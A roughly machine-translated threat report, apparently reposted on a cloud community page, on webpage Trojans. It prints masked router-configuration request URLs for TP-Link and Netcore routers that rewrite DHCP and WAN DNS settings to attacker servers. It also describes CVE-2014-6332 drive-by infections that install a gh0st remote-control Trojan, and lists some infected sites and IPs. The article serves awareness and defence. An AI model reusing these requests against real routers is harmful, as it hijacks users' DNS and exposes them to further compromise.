Network horse changes

Source: Internet
Author: User

Network horse changes

Webpage Trojans have always been a non-stop battlefield. Some Types of Trojans have been captured before, and a considerable part of them are discovered by embedding malicious code on the page, it is easy to seek out when the hosts with weak protection are accessed. The trojan author can perform subsequent operations to achieve ulterior motives.

According to the attack examples, there are many attacks targeting vrouters. Both vrouters of the tplink series and vrouters of the netcore series have suffered different types of attacks, this is mainly because of the firmware defects of the router. The following lists some of them:

1. For TPLINK series routers

1. Modify the DNS of the DHCP service. parameters: dnsserver and dnsserver2:

hxxp://XXX:XXX@192.168.1.1/XXX/XXXXXX.XXX?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=133.XXX.XXX.251&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6
2. Modify the DNS of the WAN port. parameters: dnsserver and dnsserver2:

hxxp://xxx:xxx@192.168.1.1/XXX/XXX.XXX?wan=0&lcpMru=1492&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=&dnsserver=122.xxx.xxx.93&dnsserver2=8.8.8.8&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Submit=%B1%A3+%B4%E6&Advanced=Advanced&btn_Submit=%B1%A3+%B4%E6

Ii. netcore series routers

1. Modify the DNS parameters of the DHCP service, such as dns1, dns2, and dns3:
hxxp://xxx:xxx@192.168.1.1/xxx/xxx.xxx?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1=192.168.1.2&dhcp_end_ip1=192.168.1.254&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1=133.xxx.xxx.251&dns2=8.8.8.8&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88
2. Modify the DNS parameters of the WAN port, dns1 and dns2:
 
hxxp://xxx:xxx@192.168.1.1/XXX/XXX.XXX?user=<user>&pass=<pass>&mac=<mac_current>&mac_clone_btn=MAC%E5%9C%B0%E5%9D%80%E5%85%8B%E9%9A%86&mac_def_btn2=%E6%81%A2%E5%A4%8D%E7%BC%BA%E7%9C%81MAC&mtu=<mtu>&up_bandwidth=<up_bandwidth>&down_bandwidth=<down_bandwidth>&work_mode_radio=ROUTE&work_mode=<work_mode>&isp_radio=AUTO&isp=<isp>&line_detect=<line_detect>&time=1&timer_enable=<timer_enable>&monday=1&tuesday=2&wednesday=3&thursday=4&friday=5&saturday=6&sunday=7&timer_day=<timer_day>&start_hour=<start_hour>&start_minute=<start_minute>&end_hour=<end_hour>&end_minute=<end_minute>&pppoe_conf_radio=MANU&out_time=<out_time>&pppoe_conf=MANU&server_name=<server_name>&ac_name=<ac_name>&dns1=<dns1>&dns2=<dns2>&submitbutton=%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88&uiname=<uiname>&connect_type=<connect_type>

 

 

 

However, with the upgrade of the product by the manufacturer, the effect of attacks such as routers began to decline. As a result, some Trojan writers began to turn to better exploitation methods. Recently, Microsoft recently disclosed the cve-2014-6332 and released the relevant patches, at the same time, the use of samples has been revealed online, leading to large-scale intrusion of the website Trojan. If the user does not install the latest patch locally, he or she is prone to attacks when accessing the website infected with Trojans, resulting in a zombie in the Trojan's hand ".

 

The iframe tag is used on the homepage of the website to embed html containing scripts.


 

When this vbs script is triggered, the browser will download the Remote Control Trojan Horse and implant it on the visitor's computer, it is known that browsers from IE3 to IE11 are affected.
Judging from the scope of attacks that have been captured, there are currently different levels of tampered pages in various industries across the country, or they are intentionally tampered with or infected with Trojans.
A very small part is listed below:

Http://www.99chg.com

Http: // 210.41.188.114: 8087/

Http: // 103.228.130.51

Http://www.987vv.com/

Http://www.51pkav.com/1.html

Http: // 113.10.169.69: 8080

Http://www.zseec.com/

Http://www.wanrenkao.com/fuck.htm

Most of them are pornographic sites.

A gh0st Remote Control Trojan is implanted on the visitor's computer, and the online protocol logo has not even changed.

 

Victim machines can be easily controlled by others, file uploading, screen control, or c & c attacks.
For this kind of "net horse", keep the security patch updated in a timely manner, at the same time to develop good surfing habits is very necessary, currently for CVE-2014-6332 such, 360 browser will also give the corresponding prompt:

 

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.